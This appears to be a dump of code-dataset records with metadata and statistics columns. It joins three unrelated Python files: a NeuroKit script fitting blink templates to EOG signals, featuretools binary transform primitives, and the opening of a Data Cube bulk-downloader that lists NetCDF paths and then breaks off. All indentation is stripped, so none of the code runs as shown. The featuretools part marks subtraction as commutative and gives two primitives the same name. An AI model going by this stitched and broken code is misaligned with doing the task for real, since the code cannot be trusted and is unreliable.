benchmarks/eog_blinktemplate/script.py
|
raimonpv/NeuroKit
|
cb37d83ee20d6a13a91c4848aa435f41e979e203
|
[
"MIT"
] | null | null | null |
"""This is the same code as in the article, but in a Python script.
"""
import neurokit2 as nk
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import scipy.signal
def fit_gamma(x, loc, a, scale):
x = nk.rescale(x, to=[0, 10])
gamma = scipy.stats.gamma.pdf(x, a=a, loc=loc, scale=scale)
y = gamma / np.max(gamma)
return y
def fit_scr(x, time_peak, rise, decay1, decay2):
x = nk.rescale(x, to=[0, 10])
gt = np.exp(-((x - time_peak) ** 2) / (2 * rise ** 2))
ht = np.exp(-x / decay1) + np.exp(-x / decay2)
ft = np.convolve(gt, ht)
ft = ft[0 : len(x)]
y = ft / np.max(ft)
return y
# Starting parameters
plt.plot(fit_gamma(np.arange(100), 3, 3, 0.5), linewidth=2, linestyle='-', color="#4CAF50", label='Gamma')
plt.plot(fit_scr(np.arange(100), 3.5, 0.5, 1, 1), linewidth=2, linestyle='-', color="#9C27B0", label='SCR')
params_gamma = pd.DataFrame(columns=["loc", "a", "scale", "Participant", "Task"])
params_scr = pd.DataFrame(columns=["time_peak", "rise", "decay1", "decay2", "Participant", "Task"])
for i in range(4):
print("Task: " + str(i))
data = pd.read_csv("../../data/eogdb/eogdb_task" + str(i + 1) + ".csv")
for j, participant in enumerate(np.unique(data["Participant"])[1:3]):
print(" - " + str(j + 1))
segment = data[data["Participant"] == participant]
signal = segment["vEOG"]
cleaned = nk.eog_clean(signal, sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events) # Convert to 2D array
x = np.linspace(0, 100, num=len(events))
p_gamma = np.full((events.shape[1], 3), np.nan)
p_bateman = np.full((events.shape[1], 3), np.nan)
p_scr = np.full((events.shape[1], 4), np.nan)
for i in range(events.shape[1]):
if np.isnan(events[:, i]).any():
break
events[:, i] = nk.rescale(events[:, i], to=[0, 1]) # Reshape to 0-1 scale
try:
p_gamma[i, :], _ = scipy.optimize.curve_fit(fit_gamma, x, events[:, i], p0=[3, 3, 0.5])
p_scr[i, :], _ = scipy.optimize.curve_fit(fit_scr, x, events[:, i], p0=[3.5, 0.5, 1, 1])
except RuntimeError:
pass
p_gamma = pd.DataFrame(p_gamma[~np.isnan(p_gamma).any(axis=1)], columns=["loc", "a", "scale"])
p_gamma["Participant"] = participant
p_gamma["Task"] = data["Task"][0]
params_gamma = pd.concat([params_gamma, p_gamma], axis=0)
p_scr = pd.DataFrame(p_scr[~np.isnan(p_scr).any(axis=1)], columns=["time_peak", "rise", "decay1", "decay2"])
p_scr["Participant"] = participant
p_scr["Task"] = data["Task"][0]
params_scr = pd.concat([params_scr, p_scr], axis=0)
data = pd.read_csv("../../data/eogdb/eogdb_task3.csv")
cleaned = nk.eog_clean(data["vEOG"], sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"][:-1]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events)
for i in range(events.shape[1]):
events[:, i] = nk.rescale(events[:, i], to=[0, 1]) # Reshape to 0-1 scale
x = np.linspace(0, 100, num=len(events))
template_gamma = fit_gamma(x, *np.nanmedian(params_gamma.iloc[:, [0, 1, 2]], axis=0))
template_scr = fit_scr(x, *np.nanmedian(params_scr.iloc[:, [0, 1, 2, 3]], axis=0))
plt.plot(events, linewidth=0.02, color="black")
plt.plot(template_gamma, linewidth=2, linestyle='-', color="#4CAF50", label='Gamma')
plt.plot(template_scr, linewidth=2, linestyle='-', color="#9C27B0", label='SCR')
plt.legend(loc="upper right")
plt.show()
data_rmse = pd.DataFrame(columns=["RMSE", "Index", "Participant", "Task", "Function"])
for i in range(4):
data = pd.read_csv("../../data/eogdb/eogdb_task" + str(i + 1) + ".csv")
for j, participant in enumerate(np.unique(data["Participant"])[1:3]):
segment = data[data["Participant"] == participant]
signal = segment["vEOG"]
cleaned = nk.eog_clean(signal, sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events) # Convert to 2D array
# Rescale
for i in range(events.shape[1]):
events[:, i] = nk.rescale(events[:, i], to=[0, 1]) # Reshape to 0-1 scale
# RMSE - Gamma
rmse = pd.DataFrame({"RMSE": [nk.fit_rmse(events[:, i], template_gamma) for i in range(events.shape[1])],
"Index": range(events.shape[1]),
"Participant": [participant]*events.shape[1],
"Task": [data["Task"][0]]*events.shape[1],
"Function": ["Gamma"] * events.shape[1]})
rmse["Index"] = rmse["Participant"] + "_" + rmse["Task"] + "_" + rmse["Index"].astype(str)
data_rmse = pd.concat([data_rmse, rmse], axis=0)
# RMSE - SCR
rmse = pd.DataFrame({"RMSE": [nk.fit_rmse(events[:, i], template_scr) for i in range(events.shape[1])],
"Index": range(events.shape[1]),
"Participant": [participant]*events.shape[1],
"Task": [data["Task"][0]]*events.shape[1],
"Function": ["SCR"] * events.shape[1]})
rmse["Index"] = rmse["Participant"] + "_" + rmse["Task"] + "_" + rmse["Index"].astype(str)
data_rmse = pd.concat([data_rmse, rmse], axis=0)
p = data_rmse.pivot(index='Index', columns='Function', values='RMSE').plot.kde()
p.set_xlim(0, 1)
p.axvline(x=0.25, color="red")
plt.show()
optimal_gamma = np.nanmedian(params_gamma.iloc[:, [0, 1, 2]], axis=0)
optimal_scr = np.nanmedian(params_scr.iloc[:, [0, 1, 2, 3]], axis=0)
params_gamma = pd.DataFrame(columns=["loc", "a", "scale", "Participant", "Task"])
params_scr = pd.DataFrame(columns=["time_peak", "rise", "decay1", "decay2", "Participant", "Task"])
for i in range(4):
print("Task: " + str(i))
data = pd.read_csv("../../data/eogdb/eogdb_task" + str(i + 1) + ".csv")
for j, participant in enumerate(np.unique(data["Participant"])[1:3]):
print(" - " + str(j + 1))
segment = data[data["Participant"] == participant]
signal = segment["vEOG"]
cleaned = nk.eog_clean(signal, sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events) # Convert to 2D array
x = np.linspace(0, 100, num=len(events))
p_gamma = np.full((events.shape[1], 3), np.nan)
p_scr = np.full((events.shape[1], 4), np.nan)
for i in range(events.shape[1]):
if np.isnan(events[:, i]).any():
break
events[:, i] = nk.rescale(events[:, i], to=[0, 1]) # Reshape to 0-1 scale
if nk.fit_rmse(events[:, i], template_gamma) < 0.25:
try:
p_gamma[i, :], _ = scipy.optimize.curve_fit(fit_gamma, x, events[:, i], p0=optimal_gamma)
except RuntimeError:
pass
if nk.fit_rmse(events[:, i], template_scr) < 0.25:
try:
p_scr[i, :], _ = scipy.optimize.curve_fit(fit_scr, x, events[:, i], p0=optimal_scr)
except RuntimeError:
pass
p_gamma = pd.DataFrame(p_gamma[~np.isnan(p_gamma).any(axis=1)], columns=["loc", "a", "scale"])
p_gamma["Participant"] = participant
p_gamma["Task"] = data["Task"][0]
params_gamma = pd.concat([params_gamma, p_gamma], axis=0)
p_scr = pd.DataFrame(p_scr[~np.isnan(p_scr).any(axis=1)], columns=["time_peak", "rise", "decay1", "decay2"])
p_scr["Participant"] = participant
p_scr["Task"] = data["Task"][0]
params_scr = pd.concat([params_scr, p_scr], axis=0)
x = np.linspace(0, 100, num=len(events))
template_gamma2 = fit_gamma(x, *np.nanmedian(params_gamma.iloc[:, [0, 1, 2]], axis=0))
template_scr2 = fit_scr(x, *np.nanmedian(params_scr.iloc[:, [0, 1, 2, 3]], axis=0))
data = pd.read_csv("../../data/eogdb/eogdb_task3.csv")
cleaned = nk.eog_clean(data["vEOG"], sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events)
for i in range(events.shape[1]):
events[:, i] = nk.rescale(events[:, i], to=[0, 1]) # Reshape to 0-1 scale
plt.plot(events, linewidth=0.02, color="black")
plt.plot(template_gamma, linewidth=2, linestyle='-', color="#4CAF50", label='Gamma')
plt.plot(template_gamma2, linewidth=2, linestyle='-', color="#2196F3", label='Gamma (optimized)')
plt.plot(template_scr, linewidth=2, linestyle='-', color="#9C27B0", label='SCR')
plt.plot(template_scr2, linewidth=2, linestyle='-', color="#E91E63", label='SCR (optimized)')
plt.legend(loc="upper right")
plt.show()
data_rmse = pd.DataFrame(columns=["RMSE", "Index", "Participant", "Task", "Function"])
for i in range(4):
data = pd.read_csv("../../data/eogdb/eogdb_task" + str(i + 1) + ".csv")
for j, participant in enumerate(np.unique(data["Participant"])[1:3]):
segment = data[data["Participant"] == participant]
signal = segment["vEOG"]
cleaned = nk.eog_clean(signal, sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events) # Convert to 2D array
# Rescale
for i in range(events.shape[1]):
events[:, i] = nk.rescale(events[:, i], to=[0, 1]) # Reshape to 0-1 scale
# RMSE - Gamma
rmse = pd.DataFrame({"RMSE": [nk.fit_rmse(events[:, i], template_gamma) for i in range(events.shape[1])],
"Index": range(events.shape[1]),
"Participant": [participant]*events.shape[1],
"Task": [data["Task"][0]]*events.shape[1],
"Function": ["Gamma"] * events.shape[1]})
rmse["Index"] = rmse["Participant"] + "_" + rmse["Task"] + "_" + rmse["Index"].astype(str)
data_rmse = pd.concat([data_rmse, rmse], axis=0)
# RMSE - SCR
rmse = pd.DataFrame({"RMSE": [nk.fit_rmse(events[:, i], template_scr) for i in range(events.shape[1])],
"Index": range(events.shape[1]),
"Participant": [participant]*events.shape[1],
"Task": [data["Task"][0]]*events.shape[1],
"Function": ["SCR"] * events.shape[1]})
rmse["Index"] = rmse["Participant"] + "_" + rmse["Task"] + "_" + rmse["Index"].astype(str)
data_rmse = pd.concat([data_rmse, rmse], axis=0)
df = data_rmse.pivot(index='Index', columns='Function', values='RMSE')
print(df.median(axis=0))
data = pd.read_csv("../../data/eogdb/eogdb_task3.csv")
cleaned = nk.eog_clean(data[(data["Participant"] == "S1") | (data["Participant"] == "S2")]["vEOG"], sampling_rate=200, method='neurokit')
blinks = nk.signal_findpeaks(cleaned, relative_height_min=1.5)["Peaks"]
events = nk.epochs_create(cleaned, blinks, sampling_rate=200, epochs_start=-0.4, epochs_end=0.6)
events = nk.epochs_to_array(events)
for i in range(events.shape[1]):
events[:, i] = nk.rescale(events[:, i], to=[0, 1]) # Reshape to 0-1 scale
rmse = np.array([nk.fit_rmse(events[:, i], template_gamma2) for i in range(events.shape[1])])
plt.plot(events[:, rmse < 0.25], linewidth=0.2, color="black")
plt.plot(events[:, rmse >= 0.25], linewidth=0.2, color="red")
plt.plot(template_gamma2, linewidth=2, linestyle='-', color="#2196F3", label='Gamma (optimized)')
plt.legend(loc="upper right")
plt.show()
| 38.791277
| 137
| 0.595647
| 1,767
| 12,452
| 4.074137
| 0.091681
| 0.050424
| 0.055008
| 0.024448
| 0.909154
| 0.903737
| 0.898736
| 0.877483
| 0.872621
| 0.843034
| 0
| 0.038041
| 0.214664
| 12,452
| 320
| 138
| 38.9125
| 0.698129
| 0.030196
| 0
| 0.796954
| 0
| 0
| 0.108696
| 0.016927
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010152
| false
| 0.015228
| 0.025381
| 0
| 0.045685
| 0.025381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f51470de894455f16bcd2b52e54ebd067558718
| 11,144
|
py
|
Python
|
featuretools/primitives/standard/binary_transform.py
|
Anyz01/FeatureTools
|
0bb7b29045107e10acfab07322ef00934ec21c14
|
[
"BSD-3-Clause"
] | 1
|
2019-07-29T14:47:06.000Z
|
2019-07-29T14:47:06.000Z
|
featuretools/primitives/standard/binary_transform.py
|
Anyz01/FeatureTools
|
0bb7b29045107e10acfab07322ef00934ec21c14
|
[
"BSD-3-Clause"
] | null | null | null |
featuretools/primitives/standard/binary_transform.py
|
Anyz01/FeatureTools
|
0bb7b29045107e10acfab07322ef00934ec21c14
|
[
"BSD-3-Clause"
] | null | null | null |
from builtins import str
import numpy as np
import pandas as pd
from ..base.transform_primitive_base import TransformPrimitive
from featuretools.variable_types import (
Boolean,
Datetime,
Numeric,
Ordinal,
Variable
)
class GreaterThan(TransformPrimitive):
name = "greater_than"
input_types = [[Numeric, Numeric], [Datetime, Datetime], [Ordinal, Ordinal]]
return_type = Boolean
def get_function(self):
return np.greater
def generate_name(self, base_feature_names):
return "%s > %s" % (base_feature_names[0], base_feature_names[1])
class GreaterThanScalar(TransformPrimitive):
name = "greater_than_scalar"
input_types = [[Numeric], [Datetime], [Ordinal]]
return_type = Boolean
def __init__(self, value=0):
self.value = value
def get_function(self):
def greater_than_scalar(vals):
# convert series to handle both numeric and datetime case
return pd.Series(vals) > self.value
return greater_than_scalar
def generate_name(self, base_feature_names):
return "%s > %s" % (base_feature_names[0], str(self.value))
class GreaterThanEqualTo(TransformPrimitive):
name = "greater_than_equal_to"
input_types = [[Numeric, Numeric], [Datetime, Datetime], [Ordinal, Ordinal]]
return_type = Boolean
def get_function(self):
return np.greater_equal
def generate_name(self, base_feature_names):
return "%s >= %s" % (base_feature_names[0], base_feature_names[1])
class GreaterThanEqualToScalar(TransformPrimitive):
name = "greater_than_equal_to_scalar"
input_types = [[Numeric], [Datetime], [Ordinal]]
return_type = Boolean
def __init__(self, value=0):
self.value = value
def get_function(self):
def greater_than_equal_to_scalar(vals):
# convert series to handle both numeric and datetime case
return pd.Series(vals) >= self.value
return greater_than_equal_to_scalar
def generate_name(self, base_feature_names):
return "%s >= %s" % (base_feature_names[0], str(self.value))
class LessThan(TransformPrimitive):
name = "less_than"
input_types = [[Numeric, Numeric], [Datetime, Datetime], [Ordinal, Ordinal]]
return_type = Boolean
def get_function(self):
return np.less
def generate_name(self, base_feature_names):
return "%s < %s" % (base_feature_names[0], base_feature_names[1])
class LessThanScalar(TransformPrimitive):
name = "less_than_scalar"
input_types = [[Numeric], [Datetime], [Ordinal]]
return_type = Boolean
def __init__(self, value=0):
self.value = value
def get_function(self):
def less_than_scalar(vals):
# convert series to handle both numeric and datetime case
return pd.Series(vals) < self.value
return less_than_scalar
def generate_name(self, base_feature_names):
return "%s < %s" % (base_feature_names[0], str(self.value))
class LessThanEqualTo(TransformPrimitive):
name = "less_than_equal_to"
input_types = [[Numeric, Numeric], [Datetime, Datetime], [Ordinal, Ordinal]]
return_type = Boolean
def get_function(self):
return np.less_equal
def generate_name(self, base_feature_names):
return "%s <= %s" % (base_feature_names[0], base_feature_names[1])
class LessThanEqualToScalar(TransformPrimitive):
name = "less_than_equal_to_scalar"
input_types = [[Numeric], [Datetime], [Ordinal]]
return_type = Boolean
def __init__(self, value=0):
self.value = value
def get_function(self):
def less_than_equal_to_scalar(vals):
# convert series to handle both numeric and datetime case
return pd.Series(vals) <= self.value
return less_than_equal_to_scalar
def generate_name(self, base_feature_names):
return "%s <= %s" % (base_feature_names[0], str(self.value))
class Equal(TransformPrimitive):
name = "equal"
input_types = [Variable, Variable]
return_type = Boolean
commutative = True
def get_function(self):
return np.equal
def generate_name(self, base_feature_names):
return "%s = %s" % (base_feature_names[0], base_feature_names[1])
class EqualScalar(TransformPrimitive):
name = "equal_scalar"
input_types = [Variable]
return_type = Boolean
def __init__(self, value=None):
self.value = value
def get_function(self):
def equal_scalar(vals):
# case to correct pandas type for comparison
return pd.Series(vals).astype(pd.Series([self.value]).dtype) == self.value
return equal_scalar
def generate_name(self, base_feature_names):
return "%s = %s" % (base_feature_names[0], str(self.value))
class NotEqual(TransformPrimitive):
name = "not_equal"
input_types = [Variable, Variable]
return_type = Boolean
commutative = True
def get_function(self):
return np.not_equal
def generate_name(self, base_feature_names):
return "%s != %s" % (base_feature_names[0], base_feature_names[1])
class NotEqualScalar(TransformPrimitive):
name = "not_equal_scalar"
input_types = [Variable]
return_type = Boolean
def __init__(self, value=None):
self.value = value
def get_function(self):
def not_equal_scalar(vals):
# case to correct pandas type for comparison
return pd.Series(vals).astype(pd.Series([self.value]).dtype) != self.value
return not_equal_scalar
def generate_name(self, base_feature_names):
return "%s != %s" % (base_feature_names[0], str(self.value))
class AddNumeric(TransformPrimitive):
name = "add_numeric"
input_types = [Numeric, Numeric]
return_type = Numeric
commutative = True
def get_function(self):
return np.add
def generate_name(self, base_feature_names):
return "%s + %s" % (base_feature_names[0], base_feature_names[1])
class AddNumericScalar(TransformPrimitive):
name = "add_numeric_scalar"
input_types = [Numeric]
return_type = Numeric
def __init__(self, value=0):
self.value = value
def get_function(self):
def add_scalar(vals):
return vals + self.value
return add_scalar
def generate_name(self, base_feature_names):
return "%s + %s" % (base_feature_names[0], str(self.value))
class SubtractNumeric(TransformPrimitive):
name = "subtract_numeric"
input_types = [Numeric, Numeric]
return_type = Numeric
commutative = True
def get_function(self):
return np.subtract
def generate_name(self, base_feature_names):
return "%s - %s" % (base_feature_names[0], base_feature_names[1])
class SubtractNumericScalar(TransformPrimitive):
name = "subtract_numeric_scalar"
input_types = [Numeric]
return_type = Numeric
def __init__(self, value=0):
self.value = value
def get_function(self):
def subtract_scalar(vals):
return vals - self.value
return subtract_scalar
def generate_name(self, base_feature_names):
return "%s - %s" % (base_feature_names[0], str(self.value))
class ScalarSubtractNumericFeature(TransformPrimitive):
name = "scalar_subtract_numeric_feature"
input_types = [Numeric]
return_type = Numeric
def __init__(self, value=0):
self.value = value
def get_function(self):
def scalar_subtract_numeric_feature(vals):
return self.value - vals
return scalar_subtract_numeric_feature
def generate_name(self, base_feature_names):
return "%s - %s" % (str(self.value), base_feature_names[0])
class MultiplyNumeric(TransformPrimitive):
name = "multiply_numeric"
input_types = [Numeric, Numeric]
return_type = Numeric
commutative = True
def get_function(self):
return np.multiply
def generate_name(self, base_feature_names):
return "%s * %s" % (base_feature_names[0], base_feature_names[1])
class MultiplyNumericScalar(TransformPrimitive):
name = "multiply_numeric_scalar"
input_types = [Numeric]
return_type = Numeric
def __init__(self, value=1):
self.value = value
def get_function(self):
def multiply_scalar(vals):
return vals * self.value
return multiply_scalar
def generate_name(self, base_feature_names):
return "%s * %s" % (base_feature_names[0], str(self.value))
class DivideNumeric(TransformPrimitive):
name = "divide_numeric"
input_types = [Numeric, Numeric]
return_type = Numeric
def get_function(self):
return np.divide
def generate_name(self, base_feature_names):
return "%s / %s" % (base_feature_names[0], base_feature_names[1])
class DivideNumericScalar(TransformPrimitive):
name = "divide_numeric_scalar"
input_types = [Numeric]
return_type = Numeric
def __init__(self, value=1):
self.value = value
def get_function(self):
def divide_scalar(vals):
return vals / self.value
return divide_scalar
def generate_name(self, base_feature_names):
return "%s / %s" % (base_feature_names[0], str(self.value))
class DivideByFeature(TransformPrimitive):
name = "divide_by_feature"
input_types = [Numeric]
return_type = Numeric
def __init__(self, value=1):
self.value = value
def get_function(self):
def divide_by_feature(vals):
return self.value / vals
return divide_by_feature
def generate_name(self, base_feature_names):
return "%s / %s" % (str(self.value), base_feature_names[0])
class ModuloNumeric(TransformPrimitive):
name = "modulo_numeric"
input_types = [Numeric, Numeric]
return_type = Numeric
def get_function(self):
return np.mod
def generate_name(self, base_feature_names):
return "%s %% %s" % (base_feature_names[0], base_feature_names[1])
class ModuloNumericScalar(TransformPrimitive):
name = "modulo_numeric"
input_types = [Numeric]
return_type = Numeric
def __init__(self, value=1):
self.value = value
def get_function(self):
def modulo_scalar(vals):
return vals % self.value
return modulo_scalar
def generate_name(self, base_feature_names):
return "%s %% %s" % (base_feature_names[0], str(self.value))
class And(TransformPrimitive):
name = "and"
input_types = [Boolean, Boolean]
return_type = Boolean
commutative = True
def get_function(self):
return np.logical_and
def generate_name(self, base_feature_names):
return "AND(%s, %s)" % (base_feature_names[0], base_feature_names[1])
class Or(TransformPrimitive):
name = "or"
input_types = [Boolean, Boolean]
return_type = Boolean
commutative = True
def get_function(self):
return np.logical_or
def generate_name(self, base_feature_names):
return "OR(%s, %s)" % (base_feature_names[0], base_feature_names[1])
| 27.516049
| 86
| 0.671572
| 1,359
| 11,144
| 5.222222
| 0.066961
| 0.100747
| 0.146541
| 0.065943
| 0.821615
| 0.821615
| 0.806115
| 0.762435
| 0.750881
| 0.750881
| 0
| 0.005809
| 0.227566
| 11,144
| 404
| 87
| 27.584158
| 0.818657
| 0.027728
| 0
| 0.5
| 0
| 0
| 0.056335
| 0.015885
| 0
| 0
| 0
| 0
| 0
| 1
| 0.280576
| false
| 0
| 0.017986
| 0.18705
| 0.931655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
58c3e8dc57b6d286110f3909268ea893dcd349ff
| 15,973
|
py
|
Python
|
apps/data_cube_manager/templates/bulk_downloader_result.py
|
pinkerltm/datacube-ui
|
325d404a994d49c23922e7de10c7ab244b78500b
|
[
"Apache-2.0"
] | 1
|
2019-07-22T05:24:40.000Z
|
2019-07-22T05:24:40.000Z
|
apps/data_cube_manager/templates/bulk_downloader_result.py
|
SivaramakrishnanKN/NE-GeoCloud
|
affcae49e0ccd7d29360a2771a9517147ed56590
|
[
"Apache-2.0"
] | 1
|
2019-06-06T18:31:29.000Z
|
2019-06-06T18:31:29.000Z
|
apps/data_cube_manager/templates/bulk_downloader_result.py
|
SivaramakrishnanKN/NE-GeoCloud
|
affcae49e0ccd7d29360a2771a9517147ed56590
|
[
"Apache-2.0"
] | 5
|
2019-06-05T07:26:13.000Z
|
2019-06-08T06:53:11.000Z
|
import sys
import os, os.path
import tempfile, shutil
import time
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError
from io import StringIO
try:
import datacube
except:
print("Error importing the Data Cube. Please ensure that your environment has the Data Cube installed.")
print("If you do not have the Data Cube installed, please do so by following the instructions at: ")
print("https://github.com/ceos-seo/data_cube_ui/blob/master/docs/datacube_install.md")
exit(1)
files = [
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150512092340000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150613092352000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150309092308000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150120092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151222092532000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150221092302000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151019092432000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20151120092503000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150731092402000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20151104092445000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150715092400000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150410092326000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_45_20150426092332000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_46_20151003092412000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_45_20150104092248000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150325092318000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20151206092516000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_48_20150816092406000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150901092405000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_47_46_20150528092344000000.nc",
"/datacube/ingested_data/localuser/SAMPLE_CUBE_4326_48_47_20150120092248000000.nc",
